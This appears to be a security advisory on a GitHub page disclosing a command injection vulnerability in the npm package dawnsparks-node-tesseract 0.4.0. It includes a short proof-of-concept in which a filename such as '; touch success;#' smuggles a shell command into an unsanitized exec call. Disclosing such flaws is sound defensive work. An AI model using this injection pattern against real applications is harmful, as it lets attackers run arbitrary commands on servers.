Skip to content
Permalink
ec3645003c
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Vulnerability in dawnsparks-node-tesseract

This report details an ACI vulnerability affecting dawnsparks-node-tesseract@0.4.0.

Package source

Package description

"A simple wrapper for the Tesseract OCR package for node.js"

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If (attacker-controlled) user-named image file is given to the process function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

To exploit this vulnerability, a user must submit an image file to a Node.js application that is using "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the user's submitted image filename contains shell commands, those will be evaluated, allowing the user to execute arbitrary commands on the application's server.

The proof-of-concept (PoC) program below illustrates the issue for version 0.4.0. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.

var PUT = require('dawnsparks-node-tesseract');
var user_image_filename = "; touch success;#";
try {
	new PUT.process(user_image_filename,{},function(){});
} catch (e) {
	console.log(e);
}

Environment: Node.js v15.5.1 on Linux

Steps to reproduce:

  1. npm i dawnsparks-node-tesseract@0.4.0
  2. Create a file, e.g., poc0.js, containing the PoC code.
  3. Execute the file: node poc0.js

A file called success will be created as a result of the execution of the PoC.

Remarks

This vulnerability was originally discovered in version 0.3.3 of this package, which was previously named "huedawn-tesseract" (unpublished from npm).